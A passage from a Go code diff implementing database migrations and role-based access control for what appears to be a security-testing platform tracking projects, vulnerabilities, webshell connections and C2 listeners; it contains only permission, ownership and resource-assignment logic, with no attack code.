idx_rbac_assignments_resource ON rbac_resource_assignments(resource_type, resource_id);`, + `CREATE INDEX IF NOT EXISTS idx_robot_user_bindings_user ON robot_user_bindings(rbac_user_id);`, + `CREATE INDEX IF NOT EXISTS idx_robot_binding_codes_expiry ON robot_binding_codes(expires_at);`, + `CREATE INDEX IF NOT EXISTS idx_chat_upload_artifacts_conversation ON chat_upload_artifacts(conversation_id);`, + `CREATE INDEX IF NOT EXISTS idx_chat_upload_artifacts_owner ON chat_upload_artifacts(owner_user_id);`, + `CREATE INDEX IF NOT EXISTS idx_c2_payload_artifacts_listener ON c2_payload_artifacts(listener_id);`, + } + for _, stmt := range stmts { + if _, err := db.Exec(stmt); err != nil { + return err + } + } + return nil +} + +func (db *DB) migrateRBACOwnershipColumns() error { + for _, col := range []struct { + table string + name string + stmt string + }{ + {"projects", "owner_user_id", "ALTER TABLE projects ADD COLUMN owner_user_id TEXT"}, + {"conversations", "owner_user_id", "ALTER TABLE conversations ADD COLUMN owner_user_id TEXT"}, + {"vulnerabilities", "owner_user_id", "ALTER TABLE vulnerabilities ADD COLUMN owner_user_id TEXT"}, + {"webshell_connections", "owner_user_id", "ALTER TABLE webshell_connections ADD COLUMN owner_user_id TEXT"}, + {"batch_task_queues", "owner_user_id", "ALTER TABLE batch_task_queues ADD COLUMN owner_user_id TEXT"}, + {"c2_listeners", "owner_user_id", "ALTER TABLE c2_listeners ADD COLUMN owner_user_id TEXT"}, + {"conversation_groups", "owner_user_id", "ALTER TABLE conversation_groups ADD COLUMN owner_user_id TEXT"}, + {"tool_executions", "owner_user_id", "ALTER TABLE tool_executions ADD COLUMN owner_user_id TEXT"}, + {"tool_executions", "conversation_id", "ALTER TABLE tool_executions ADD COLUMN conversation_id TEXT"}, + } { + if err := db.addColumnIfMissing(col.table, col.name, col.stmt); err != nil { + return err + } + } + _, _ = db.Exec(`CREATE INDEX IF NOT EXISTS idx_tool_executions_owner ON tool_executions(owner_user_id)`) + _, _ = db.Exec(`CREATE INDEX IF NOT EXISTS idx_tool_executions_conversation ON tool_executions(conversation_id)`) + return nil +} + +func (db *DB) addColumnIfMissing(table, name, stmt string) error { + var count int + err := db.QueryRow("SELECT COUNT(*) FROM pragma_table_info(?) WHERE name=?", table, name).Scan(&count) + if err != nil || count == 0 { + if _, addErr := db.Exec(stmt); addErr != nil { + msg := strings.ToLower(addErr.Error()) + if !strings.Contains(msg, "duplicate column") && !strings.Contains(msg, "already exists") { + return fmt.Errorf("添加%s.%s字段失败: %w", table, name, addErr) + } + } + } + return nil +} + +// RBACNeedsAdminPassword reports whether the built-in admin account still needs an initial password. +func (db *DB) RBACNeedsAdminPassword() (bool, error) { + var userCount int + if err := db.QueryRow(`SELECT COUNT(*) FROM rbac_users`).Scan(&userCount); err != nil { + return false, err + } + if userCount == 0 { + return true, nil + } + var hash sql.NullString + err := db.QueryRow(` + SELECT password_hash FROM rbac_users + WHERE username = 'admin' AND is_builtin = 1 + LIMIT 1 + `).Scan(&hash) + if err == sql.ErrNoRows { + return false, nil + } + if err != nil { + return false, err + } + return !hash.Valid || strings.TrimSpace(hash.String) == "", nil +} + +// BootstrapRBAC seeds the local admin account and system roles. +func (db *DB) BootstrapRBAC(adminPasswordHash string, permissions map[string]string) error { + now := time.Now() + tx, err := db.Begin() + if err != nil { + return err + } + defer func() { _ = tx.Rollback() }() + + for key, desc := range permissions { + key = strings.TrimSpace(key) + if key == "" { + continue + } + if _, err := tx.Exec(`INSERT OR IGNORE INTO rbac_permissions (key, description, created_at) VALUES (?, ?, ?)`, key, desc, now); err != nil { + return err + } + if _, err := tx.Exec(`UPDATE rbac_permissions SET description = ? WHERE key = ?`, desc, key); err != nil { + return err + } + } + // Remove stale/unknown keys so a permission invented by an older build or + // manual database edit cannot become active automatically if a future route + // happens to reuse the same name. + permissionRows, err := tx.Query(`SELECT key FROM rbac_permissions`) + if err != nil { + return err + } + var stalePermissionKeys []string + for permissionRows.Next() { + var key string + if err := permissionRows.Scan(&key); err != nil { + _ = permissionRows.Close() + return err + } + if _, known := permissions[key]; !known { + stalePermissionKeys = append(stalePermissionKeys, key) + } + } + if err := permissionRows.Close(); err != nil { + return err + } + for _, key := range stalePermissionKeys { + if _, err := tx.Exec(`DELETE FROM rbac_role_permissions WHERE permission_key = ?`, key); err != nil { + return err + } + if _, err := tx.Exec(`DELETE FROM rbac_permissions WHERE key = ?`, key); err != nil { + return err + } + } + + systemRoles := []RBACRole{ + {ID: RBACSystemRoleAdmin, Name: "管理员", Description: "全局管理权限", Scope: RBACScopeAll, IsSystem: true}, + {ID: RBACSystemRoleOperator, Name: "操作员", Description: "可执行日常安全工作流,不能管理账号与核心配置", Scope: RBACScopeAssigned, IsSystem: true}, + {ID: RBACSystemRoleAuditor, Name: "审计员", Description: "只读查看审计、监控与资产", Scope: RBACScopeAll, IsSystem: true}, + {ID: RBACSystemRoleViewer, Name: "只读用户", Description: "只读查看被授权资源", Scope: RBACScopeAssigned, IsSystem: true}, + } + for _, role := range systemRoles { + if _, err := tx.Exec(` + INSERT INTO rbac_roles (id, name, description, scope, is_system, created_at, updated_at) + VALUES (?, ?, ?, ?, ?, ?, ?) + ON CONFLICT(id) DO UPDATE SET name=excluded.name, description=excluded.description, scope=excluded.scope, is_system=excluded.is_system, updated_at=excluded.updated_at + `, role.ID, role.Name, role.Description, role.Scope, boolToInt(role.IsSystem), now, now); err != nil { + return err + } + } + + var userCount int + if err := tx.QueryRow(`SELECT COUNT(*) FROM rbac_users`).Scan(&userCount); err != nil { + return err + } + if userCount == 0 { + if strings.TrimSpace(adminPasswordHash) == "" { + return errors.New("admin password hash is required for initial bootstrap") + } + if _, err := tx.Exec(` + INSERT INTO rbac_users (id, username, display_name, password_hash, enabled, is_builtin, created_at, updated_at) + VALUES (?, 'admin', '管理员', ?, 1, 1, ?, ?) + `, "admin", adminPasswordHash, now, now); err != nil { + return err + } + if _, err := tx.Exec(`INSERT OR IGNORE INTO rbac_user_roles (user_id, role_id, created_at) VALUES ('admin', ?, ?)`, RBACSystemRoleAdmin, now); err != nil { + return err + } + } else if strings.TrimSpace(adminPasswordHash) != "" { + if _, err := tx.Exec(`UPDATE rbac_users SET password_hash = ?, updated_at = ? WHERE username = 'admin' AND is_builtin = 1 AND (password_hash = '' OR password_hash IS NULL)`, adminPasswordHash, now); err != nil { + return err + } + } + + if err := grantSystemRolePermissions(tx, permissions); err != nil { + return err + } + + return tx.Commit() +} + +func grantSystemRolePermissions(tx *sql.Tx, permissions map[string]string) error { + now := time.Now() + // System roles are immutable and owned by the application. Rebuild their + // grants deterministically so policy tightening also removes permissions + // seeded by older versions instead of leaving stale INSERT OR IGNORE rows. + if _, err := tx.Exec(`DELETE FROM rbac_role_permissions WHERE role_id IN (?, ?, ?, ?)`, RBACSystemRoleAdmin, RBACSystemRoleOperator, RBACSystemRoleAuditor, RBACSystemRoleViewer); err != nil { + return err + } + for key := range permissions { + if _, err := tx.Exec(`INSERT OR IGNORE INTO rbac_role_permissions (role_id, permission_key, created_at) VALUES (?, ?, ?)`, RBACSystemRoleAdmin, key, now); err != nil { + return err + } + switch { + case key == "auth:self": + for _, roleID := range []string{RBACSystemRoleOperator, RBACSystemRoleAuditor, RBACSystemRoleViewer} { + if _, err := tx.Exec(`INSERT OR IGNORE INTO rbac_role_permissions (role_id, permission_key, created_at) VALUES (?, ?, ?)`, roleID, key, now); err != nil { + return err + } + } + case key == "audit:read": + if _, err := tx.Exec(`INSERT OR IGNORE INTO rbac_role_permissions (role_id, permission_key, created_at) VALUES (?, ?, ?)`, RBACSystemRoleAuditor, key, now); err != nil { + return err + } + case strings.HasPrefix(key, "rbac:"), strings.HasPrefix(key, "config:"), strings.HasPrefix(key, "terminal:"), strings.HasPrefix(key, "audit:"): + continue + case key == "mcp:write" || key == "mcp:external:execute": + continue + case key == "roles:write" || key == "roles:delete" || + key == "skills:write" || key == "skills:delete" || + key == "agents:write" || key == "agents:delete" || + key == "knowledge:write" || key == "knowledge:delete" || + key == "workflow:write" || key == "workflow:delete" || key == "robot:write": + continue + case strings.HasSuffix(key, ":read"): + for _, roleID := range []string{RBACSystemRoleOperator, RBACSystemRoleAuditor, RBACSystemRoleViewer} { + if _, err := tx.Exec(`INSERT OR IGNORE INTO rbac_role_permissions (role_id, permission_key, created_at) VALUES (?, ?, ?)`, roleID, key, now); err != nil { + return err + } + } + default: + if _, err := tx.Exec(`INSERT OR IGNORE INTO rbac_role_permissions (role_id, permission_key, created_at) VALUES (?, ?, ?)`, RBACSystemRoleOperator, key, now); err != nil { + return err + } + } + } + return nil +} + +func (db *DB) GetRBACUserByUsername(username string) (*RBACUser, error) { + username = strings.TrimSpace(strings.ToLower(username)) + if username == "" { + return nil, sql.ErrNoRows + } + return db.scanRBACUser(db.QueryRow(` + SELECT id, username, display_name, password_hash, enabled, is_builtin, created_at, updated_at + FROM rbac_users WHERE username = ? + `, username)) +} + +func (db *DB) GetRBACUserByID(id string) (*RBACUser, error) { + id = strings.TrimSpace(id) + if id == "" { + return nil, sql.ErrNoRows + } + return db.scanRBACUser(db.QueryRow(` + SELECT id, username, display_name, password_hash, enabled, is_builtin, created_at, updated_at + FROM rbac_users WHERE id = ? + `, id)) +} + +func (db *DB) scanRBACUser(row *sql.Row) (*RBACUser, error) { + var u RBACUser + var enabled, builtin int + var createdAt, updatedAt string + if err := row.Scan(&u.ID, &u.Username, &u.DisplayName, &u.PasswordHash, &enabled, &builtin, &createdAt, &updatedAt); err != nil { + return nil, err + } + u.Enabled = enabled != 0 + u.IsBuiltin = builtin != 0 + u.CreatedAt = parseDBTime(createdAt) + u.UpdatedAt = parseDBTime(updatedAt) + return &u, nil +} + +func (db *DB) ResolveRBACAccess(userID string) (*RBACAccess, error) { + u, err := db.GetRBACUserByID(userID) + if err != nil { + return nil, err + } + rows, err := db.Query(` + SELECT r.id, r.name, r.description, r.scope, r.is_system, r.created_at, r.updated_at + FROM rbac_roles r + JOIN rbac_user_roles ur ON ur.role_id = r.id + WHERE ur.user_id = ? + ORDER BY r.is_system DESC, r.name ASC + `, userID) + if err != nil { + return nil, err + } + defer rows.Close() + + access := &RBACAccess{ + User: *u, Permissions: map[string]bool{}, PermissionScopes: map[string]string{}, Scope: RBACScopeOwn, + } + for rows.Next() { + var role RBACRole + var isSystem int + var createdAt, updatedAt string + if err := rows.Scan(&role.ID, &role.Name, &role.Description, &role.Scope, &isSystem, &createdAt, &updatedAt); err != nil { + return nil, err + } + role.IsSystem = isSystem != 0 + role.CreatedAt = parseDBTime(createdAt) + role.UpdatedAt = parseDBTime(updatedAt) + access.Roles = append(access.Roles, role) + access.Scope = mergeRBACScope(access.Scope, role.Scope) + } + if err := rows.Err(); err != nil { + return nil, err + } + + prows, err := db.Query(` + SELECT rp.permission_key, r.scope + FROM rbac_role_permissions rp + JOIN rbac_user_roles ur ON ur.role_id = rp.role_id + JOIN rbac_roles r ON r.id = rp.role_id + WHERE ur.user_id = ? + `, userID) + if err != nil { + return nil, err + } + defer prows.Close() + for prows.Next() { + var key, scope string + if err := prows.Scan(&key, &scope); err != nil { + return nil, err + } + access.Permissions[key] = true + if existing, ok := access.PermissionScopes[key]; ok { + access.PermissionScopes[key] = mergeRBACScope(existing, scope) + } else { + access.PermissionScopes[key] = scope + } + } + return access, prows.Err() +} + +func mergeRBACScope(a, b string) string { + if a == RBACScopeAll || b == RBACScopeAll { + return RBACScopeAll + } + if a == RBACScopeAssigned || b == RBACScopeAssigned { + return RBACScopeAssigned + } + return RBACScopeOwn +} + +func (db *DB) UserCanAccessResource(userID, scope, resourceType, resourceID string) bool { + userID = strings.TrimSpace(userID) + resourceType = strings.TrimSpace(resourceType) + resourceID = strings.TrimSpace(resourceID) + if userID == "" || resourceType == "" || resourceID == "" { + return false + } + if scope == RBACScopeAll { + return true + } + if scope == RBACScopeOwn { + if db.userOwnsResource(userID, resourceType, resourceID) { + return true + } + } + var n int + err := db.QueryRow(`SELECT COUNT(*) FROM rbac_resource_assignments WHERE user_id = ? AND resource_type = ? AND resource_id = ?`, userID, resourceType, resourceID).Scan(&n) + if err == nil && n > 0 { + return true + } + if resourceType == "vulnerability" { + return db.userCanAccessVulnerabilityViaParent(userID, scope, resourceID) + } + if resourceType == "asset" { + return db.userCanAccessAssetViaParent(userID, scope, resourceID) + } + if resourceType == "conversation" { + return db.userCanAccessConversationViaParent(userID, scope, resourceID) + } + if strings.HasPrefix(resourceType, "c2_") { + return db.userCanAccessC2ViaParent(userID, scope, resourceType, resourceID) + } + return false +} + +func (db *DB) userCanAccessAssetViaParent(userID, scope, assetID string) bool { + var projectID sql.NullString + if err := db.QueryRow(`SELECT project_id FROM assets WHERE id = ?`, assetID).Scan(&projectID); err != nil { + return false + } + return projectID.Valid && strings.TrimSpace(projectID.String) != "" && + db.UserCanAccessResource(userID, scope, "project", strings.TrimSpace(projectID.String)) +} + +func (db *DB) userCanAccessConversationViaParent(userID, scope, conversationID string) bool { + var projectID sql.NullString + if err := db.QueryRow(`SELECT project_id FROM conversations WHERE id = ?`, conversationID).Scan(&projectID); err != nil { + return false + } + return projectID.Valid && strings.TrimSpace(projectID.String) != "" && + db.UserCanAccessResource(userID, scope, "project", strings.TrimSpace(projectID.String)) +} + +func (db *DB) userCanAccessVulnerabilityViaParent(userID, scope, vulnerabilityID string) bool { + var projectID, conversationID sql.NullString + err := db.QueryRow(`SELECT project_id, conversation_id FROM vulnerabilities WHERE id = ?`, vulnerabilityID).Scan(&projectID, &conversationID) + if err != nil { + return false + } + if projectID.Valid && strings.TrimSpace(projectID.String) != "" && db.UserCanAccessResource(userID, scope, "project", strings.TrimSpace(projectID.String)) { + return true + } + if conversationID.Valid && strings.TrimSpace(conversationID.String) != "" && db.UserCanAccessResource(userID, scope, "conversation", strings.TrimSpace(conversationID.String)) { + return true + } + return false +} + +func (db *DB) UserCanAccessMessage(userID, scope, messageID string) bool { + var conversationID string + err := db.QueryRow(`SELECT conversation_id FROM messages WHERE id = ?`, strings.TrimSpace(messageID)).Scan(&conversationID) + if err != nil { + return false + } + return db.UserCanAccessResource(userID, scope, "conversation", conversationID) +} + +func (db *DB) UserCanAccessProcessDetail(userID, scope, processDetailID string) bool { + var conversationID string + err := db.QueryRow(`SELECT conversation_id FROM process_details WHERE id = ?`, strings.TrimSpace(processDetailID)).Scan(&conversationID) + if err != nil { + return false + } + return db.UserCanAccessResource(userID, scope, "conversation", conversationID) +} + +func (db *DB) userCanAccessC2ViaParent(userID, scope, resourceType, resourceID string) bool { + switch resourceType { + case "c2_session": + var listenerID string + if err := db.QueryRow(`SELECT listener_id FROM c2_sessions WHERE id = ?`, resourceID).Scan(&listenerID); err != nil { + return false + } + return db.UserCanAccessResource(userID, scope, "c2_listener", listenerID) + case "c2_task": + var sessionID string + if err := db.QueryRow(`SELECT session_id FROM c2_tasks WHERE id = ?`, resourceID).Scan(&sessionID); err != nil { + return false + } + return db.UserCanAccessResource(userID, scope, "c2_session", sessionID) + case "c2_file": + var sessionID string + if err := db.QueryRow(`SELECT session_id FROM c2_files WHERE id = ?`, resourceID).Scan(&sessionID); err != nil { + return false + } + return db.UserCanAccessResource(userID, scope, "c2_session", sessionID) + case "c2_event": + var sessionID, taskID sql.NullString + if err := db.QueryRow(`SELECT session_id, task_id FROM c2_events WHERE id = ?`, resourceID).Scan(&sessionID, &taskID); err != nil { + return false + } + if sessionID.Valid && strings.TrimSpace(sessionID.String) != "" { + return db.UserCanAccessResource(userID, scope, "c2_session", strings.TrimSpace(sessionID.String)) + } + if taskID.Valid && strings.TrimSpace(taskID.String) != "" { + return db.UserCanAccessResource(userID, scope, "c2_task", strings.TrimSpace(taskID.String)) + } + } + return false +} + +func (db *DB) userOwnsResource(userID, resourceType, resourceID string) bool { + table := "" + switch resourceType { + case "project": + table = "projects" + case "conversation": + table = "conversations" + case "vulnerability": + table = "vulnerabilities" + case "asset": + table = "assets" + case "webshell": + table = "webshell_connections" + case "batch_task": + table = "batch_task_queues" + case "c2_listener": + table = "c2_listeners" + default: + return false + } + var n int + err := db.QueryRow(`SELECT COUNT(*) FROM `+table+` WHERE id = ? AND owner_user_id = ?`, resourceID, userID).Scan(&n) + return err == nil && n > 0 +} + +func (db *DB) SetResourceOwner(resourceType, resourceID, userID string) error { + userID = strings.TrimSpace(userID) + if userID == "" { + return nil + } + table := "" + switch resourceType { + case "project": + table = "projects" + case "conversation": + table = "conversations" + case "vulnerability": + table = "vulnerabilities" + case "asset": + table = "assets" + case "webshell": + table = "webshell_connections" + case "batch_task": + table = "batch_task_queues" + case "c2_listener": + table = "c2_listeners" + default: + return nil + } + _, err := db.Exec(`UPDATE `+table+` SET owner_user_id = COALESCE(NULLIF(owner_user_id, ''), ?) WHERE id = ?`, userID, resourceID) + return err +} + +func (db *DB) GetResourceOwner(resourceType, resourceID string) string { + table := "" + switch strings.TrimSpace(resourceType) { + case "project": + table = "projects" + case "conversation": + table = "conversations" + case "vulnerability": + table = "vulnerabilities" + case "asset": + table = "assets" + case "webshell": + table = "webshell_connections" + case "batch_task": + table = "batch_task_queues" + case "c2_listener": + table = "c2_listeners" + default: + return "" + } + var owner sql.NullString + if err := db.QueryRow(`SELECT owner_user_id FROM `+table+` WHERE id = ?`, strings.TrimSpace(resourceID)).Scan(&owner); err != nil { + return "" + } + return strings.TrimSpace(owner.String) +} + +func (db *DB) AssignResourceToUser(userID, resourceType, resourceID string) error { + _, err := db.AssignResourcesToUser(userID, resourceType, []string{resourceID}) + return err +} + +// ListAssignableRBACResources returns real resources for the admin assignment +// picker without exposing full records or secret-bearing fields. +func (db *DB) ListAssignableRBACResources(resourceType, search string, limit int) ([]RBACResourceOption, error) { + return db.ListAssignableRBACResourcesPage(resourceType, search, limit, 0) +} + +// ListAssignableRBACResourcesPage returns one stable page for the assignment +// picker. Callers can request limit+1 rows to determine whether another page +// exists without running a separate COUNT query. +func (db *DB) ListAssignableRBACResourcesPage(resourceType, search string, limit, offset int) ([]RBACResourceOption, error) { + resourceType = strings.TrimSpace(resourceType) + if _, ok := rbacAssignableResourceTables[resourceType]; !ok { + return nil, fmt.Errorf("不支持的资源类型: %s", resourceType) + } + if limit <= 0 || limit > 100 { + limit = 50 + } + if offset < 0 { + offset = 0 + } + pattern := "%" + strings.ToLower(strings.NewReplacer( + `\`, `\\`, + `%`, `\%`, + `_`, `\_`, + ).Replace(strings.TrimSpace(search))) + "%" + + var query string + switch resourceType { + case "project": + query = `SELECT id, name, status FROM projects + WHERE LOWER(name) LIKE ? ESCAPE '\' OR LOWER(id) LIKE ? ESCAPE '\' + ORDER BY updated_at DESC LIMIT ? OFFSET ?` + case "conversation": + query = `SELECT id, COALESCE(NULLIF(TRIM(title), ''), '未命名对话'), COALESCE(project_id, '') FROM conversations + WHERE LOWER(COALESCE(NULLIF(TRIM(title), ''), id)) LIKE ? ESCAPE '\' OR LOWER(id) LIKE ? ESCAPE '\' + ORDER BY updated_at DESC LIMIT ? OFFSET ?` + case "vulnerability": + query = `SELECT id, title, severity FROM vulnerabilities + WHERE LOWER(title) LIKE ? ESCAPE '\' OR LOWER(id) LIKE ? ESCAPE '\' + ORDER BY updated_at DESC LIMIT ? OFFSET ?` + case "asset": + query = `SELECT id, COALESCE(NULLIF(host,''),NULLIF(domain,''),NULLIF(ip,''),id), protocol || CASE WHEN port>0 THEN ':' || port ELSE '' END FROM assets + WHERE LOWER(host) LIKE ? ESCAPE '\' OR LOWER(domain) LIKE ? ESCAPE '\' OR LOWER(ip) LIKE ? ESCAPE '\' + ORDER BY updated_at DESC LIMIT ? OFFSET ?` + case "webshell": + query = `SELECT id, COALESCE(NULLIF(remark, ''), url), type FROM webshell_connections + WHERE LOWER(COALESCE(NULLIF(remark, ''), url)) LIKE ? ESCAPE '\' OR LOWER(id) LIKE ? ESCAPE '\' + ORDER BY created_at DESC LIMIT ? OFFSET ?` + case "batch_task": + query = `SELECT id, COALESCE(NULLIF(title, ''), id), status FROM batch_task_queues + WHERE LOWER(COALESCE(NULLIF(title, ''), id)) LIKE ? ESCAPE '\' OR LOWER(id) LIKE ? ESCAPE '\' + ORDER BY created_at DESC LIMIT ? OFFSET ?` + case "c2_listener": + query = `SELECT id, name, type || ' · ' || status FROM c2_listeners + WHERE LOWER(name) LIKE ? ESCAPE '\' OR LOWER(id) LIKE ? ESCAPE '\' + ORDER BY created_at DESC LIMIT ? OFFSET ?` + } + + queryArgs := []interface{}{pattern, pattern} + if resourceType == "asset" { + queryArgs = append(queryArgs, pattern) + } + queryArgs = append(queryArgs, limit, offset) + rows, err := db.Query(query, queryArgs...) + if err != nil { + return nil, err + } + defer rows.Close() + options := make([]RBACResourceOption, 0) + for rows.Next() { + var option RBACResourceOption + if err := rows.Scan(&option.ID, &option.Label, &option.Detail); err != nil { + return nil, err + } + option.Label = normalizeRBACResourceLabel(option.Label, option.ID) + options = append(options, option) + } + return options, rows.Err() +} + +// CountAssignableRBACResources returns the total rows matching the resource picker filter. +func (db *DB) CountAssignableRBACResources(resourceType, search string) (int, error) { + resourceType = strings.TrimSpace(resourceType) + if _, ok := rbacAssignableResourceTables[resourceType]; !ok { + return 0, fmt.Errorf("不支持的资源类型: %s", resourceType) + } + pattern := "%" + strings.ToLower(strings.NewReplacer( + `\`, `\\`, `%`, `\%`, `_`, `\_`, + ).Replace(strings.TrimSpace(search))) + "%" + var query string + switch resourceType { + case "project": + query = `SELECT COUNT(*) FROM projects WHERE LOWER(name) LIKE ? ESCAPE '\' OR LOWER(id) LIKE ? ESCAPE '\'` + case "conversation": + query = `SELECT COUNT(*) FROM conversations WHERE LOWER(COALESCE(NULLIF(TRIM(title), ''), id)) LIKE ? ESCAPE '\' OR LOWER(id) LIKE ? ESCAPE '\'` + case "vulnerability": + query = `SELECT COUNT(*) FROM vulnerabilities WHERE LOWER(title) LIKE ? ESCAPE '\' OR LOWER(id) LIKE ? ESCAPE '\'` + case "asset": + query = `SELECT COUNT(*) FROM assets WHERE LOWER(host) LIKE ? ESCAPE '\' OR LOWER(domain) LIKE ? ESCAPE '\' OR LOWER(ip) LIKE ? ESCAPE '\'` + case "webshell": + query = `SELECT COUNT(*) FROM webshell_connections WHERE LOWER(COALESCE(NULLIF(remark, ''), url)) LIKE ? ESCAPE '\' OR LOWER(id) LIKE ? ESCAPE '\'` + case "batch_task": + query = `SELECT COUNT(*) FROM batch_task_queues WHERE LOWER(COALESCE(NULLIF(title, ''), id)) LIKE ? ESCAPE '\' OR LOWER(id) LIKE ? ESCAPE '\'` + case "c2_listener": + query = `SELECT COUNT(*) FROM c2_listeners WHERE LOWER(name) LIKE ? ESCAPE '\' OR LOWER(id) LIKE ? ESCAPE '\'` + } + var total int + queryArgs := []interface{}{pattern, pattern} + if resourceType == "asset" { + queryArgs = append(queryArgs, pattern) + } + if err := db.QueryRow(query, queryArgs...).Scan(&total); err != nil { + return 0, err + } + return total, nil +} + +func normalizeRBACResourceLabel(label, id string) string { + label = strings.TrimSpace(label) + if label == "" { + return "资源 " + shortRBACResourceID(id) + } + if isWeakRBACResourceLabel(label) { + return label + " · " + shortRBACResourceID(id) + } + return label +} + +func isWeakRBACResourceLabel(label string) bool { + runes := []rune(strings.TrimSpace(label)) + if len(runes) <= 1 { + return true + } + if len(runes) <= 3 { + numeric := true + for _, r := range runes { + if r < '0' || r > '9' { + numeric = false + break + } + } + return numeric + } + return false +} + +func shortRBACResourceID(id string) string { + id = strings.TrimSpace(id) + if len(id) <= 12 { + return id + } + return id[:8] + "…" +} + +func (db *DB) lookupRBACResourceOptionsByIDs(resourceType string, ids []string) (map[string]RBACResourceOption, error) { + resourceType = strings.TrimSpace(resourceType) + if _, ok := rbacAssignableResourceTables[resourceType]; !ok { + return nil, fmt.Errorf("不支持的资源类型: %s", resourceType) + } + unique := make([]string, 0, len(ids)) + seen := make(map[string]struct{}, len(ids)) + for _, rawID := range ids { + id := strings.TrimSpace(rawID) + if id == "" { + continue + } + if _, exists := seen[id]; exists { + continue + } + seen[id] = struct{}{} + unique = append(unique, id) + } + out := make(map[string]RBACResourceOption, len(unique)) + if len(unique) == 0 { + return out, nil + } + + placeholders := strings.TrimRight(strings.Repeat("?,", len(unique)), ",") + args := make([]interface{}, 0, len(unique)) + for _, id := range unique { + args = append(args, id) + } + + var query string + switch resourceType { + case "project": + query = `SELECT id, name, status FROM projects WHERE id IN (` + placeholders + `)` + case "conversation": + query = `SELECT id, COALESCE(NULLIF(TRIM(title), ''), '未命名对话'), COALESCE(project_id, '') FROM conversations WHERE id IN (` + placeholders + `)` + case "vulnerability": + query = `SELECT id, title, severity FROM vulnerabilities WHERE id IN (` + placeholders + `)` + case "asset": + query = `SELECT id, COALESCE(NULLIF(host,''),NULLIF(domain,''),NULLIF(ip,''),id), protocol || CASE WHEN port>0 THEN ':' || port ELSE '' END FROM assets WHERE id IN (` + placeholders + `)` + case "webshell": + query = `SELECT id, COALESCE(NULLIF(remark, ''), url), type FROM webshell_connections WHERE id IN (` + placeholders + `)` + case "batch_task": + query = `SELECT id, COALESCE(NULLIF(title, ''), id), status FROM batch_task_queues WHERE id IN (` + placeholders + `)` + case "c2_listener": + query = `SELECT id, name, type || ' · ' || status FROM c2_listeners WHERE id IN (` + placeholders + `)` + default: + return out, nil + } + + rows, err := db.Query(query, args...) + if err != nil { + return nil, err + } + defer rows.Close() + for rows.Next() { + var option RBACResourceOption + if err := rows.Scan(&option.ID, &option.Label, &option.Detail); err != nil { + return nil, err + } + option.Label = normalizeRBACResourceLabel(option.Label, option.ID) + out[option.ID] = option + } + return out, rows.Err() +} + +func enrichRBACAssignmentLabels(rows []RBACResourceAssignment, lookup func(resourceType string, ids []string) (map[string]RBACResourceOption, error)) error { + if lookup == nil || len(rows) == 0 { + return nil + } + idsByType := make(map[string][]string) + for _, row := range rows { + idsByType[row.ResourceType] = append(idsByType[row.ResourceType], row.ResourceID) + } + labelsByType := make(map[string]map[string]RBACResourceOption, len(idsByType)) + for resourceType, ids := range idsByType { + options, err := lookup(resourceType, ids) + if err != nil { + return err + } + labelsByType[resourceType] = options + } + for i := range rows { + options := labelsByType[rows[i].ResourceType] + if options == nil { + continue + } + if option, ok := options[rows[i].ResourceID]; ok { + rows[i].ResourceLabel = option.Label + rows[i].ResourceDetail = option.Detail + } + } + return nil +} + +// AssignResourcesToUser validates the complete request before writing anything, +// then inserts all grants in one transaction. Existing grants are idempotent. +func (db *DB) AssignResourcesToUser(userID, resourceType string, resourceIDs []string) (int64, error) { + userID = strings.TrimSpace(userID) + resourceType = strings.TrimSpace(resourceType) + if userID == "" || resourceType == "" || len(resourceIDs) == 0 { + return 0, errors.New("user_id, resource_type and resource_ids are required") + } + if len(resourceIDs) > RBACMaxBatchResourceAssignments { + return 0, fmt.Errorf("一次最多授权 %d 个资源", RBACMaxBatchResourceAssignments) + } + table, ok := rbacAssignableResourceTables[resourceType] + if !ok { + return 0, fmt.Errorf("不支持的资源类型: %s", resourceType) + } + + uniqueIDs := make([]string, 0, len(resourceIDs)) + seen := make(map[string]struct{}, len(resourceIDs)) + for _, rawID := range resourceIDs { + id := strings.TrimSpace(rawID) + if id == "" { + return 0, errors.New("资源 ID 不能为空") + } + if _, exists := seen[id]; exists { + continue + } + seen[id] = struct{}{} + uniqueIDs = append(uniqueIDs, id) + } + if len(uniqueIDs) == 0 { + return 0, errors.New("资源 ID 不能为空") + } + + tx, err := db.Begin() + if err != nil { + return 0, err + } + defer func() { _ = tx.Rollback() }() + + var userExists int + if err := tx.QueryRow(`SELECT COUNT(*) FROM rbac_users WHERE id = ?`, userID).Scan(&userExists); err != nil { + return 0, err + } + if userExists == 0 { + return 0, errors.New("用户不存在") + } + for _, resourceID := range uniqueIDs { + var exists int + if err := tx.QueryRow(`SELECT COUNT(*) FROM `+table+` WHERE id = ?`, resourceID).Scan(&exists); err != nil { + return 0, err + } + if exists == 0 { + return 0, fmt.Errorf("资源不存在: %s/%s", resourceType, resourceID) + } + } + + var created int64 + for _, resourceID := range uniqueIDs { + result, err := tx.Exec(` + INSERT OR IGNORE INTO rbac_resource_assignments (id, user_id, resource_type, resource_id, created_at) + VALUES (?, ?, ?, ?, ?) + `, uuid.NewString(), userID, resourceType, resourceID, time.Now()) + if err != nil { + return 0, err + } + if n, err := result.RowsAffected(); err == nil { + created += n + } + } + if err := tx.Commit(); err != nil { + return 0, err + } + return created, nil +} + +// AssignResourcesToUserAuto detects each resource's actual type before writing. +// The whole batch is validated first and committed atomically. +func (db *DB) AssignResourcesToUserAuto(userID string, resourceIDs []string) (int64, map[string]string, error) { + userID = strings.TrimSpace(userID) + if userID == "" || len(resourceIDs) == 0 { + return 0, nil, errors.New("user_id and resource_ids are required") + } + if len(resourceIDs) > RBACMaxBatchResourceAssignments { + return 0, nil, fmt.Errorf("一次最多授权 %d 个资源", RBACMaxBatchResourceAssignments) + } + uniqueIDs := make([]string, 0, len(resourceIDs)) + seen := make(map[string]struct{}, len(resourceIDs)) + for _, rawID := range resourceIDs { + id := strings.TrimSpace(rawID) + if id == "" { + return 0, nil, errors.New("资源 ID 不能为空") + } + if _, exists := seen[id]; exists { + continue + } + seen[id] = struct{}{} + uniqueIDs = append(uniqueIDs, id) + } + + tx, err := db.Begin() + if err != nil { + return 0, nil, err + } + defer func() { _ = tx.Rollback() }() + var userExists int + if err := tx.QueryRow(`SELECT COUNT(*) FROM rbac_users WHERE id = ?`, userID).Scan(&userExists); err != nil { + return 0, nil, err + } + if userExists == 0 { + return 0, nil, errors.New("用户不存在") + } + + typeTablePairs := []struct{ resourceType, table string }{ + {"project", "projects"}, {"conversation", "conversations"}, + {"vulnerability", "vulnerabilities"}, {"webshell", "webshell_connections"}, + {"asset", "assets"}, + {"batch_task", "batch_task_queues"}, {"c2_listener", 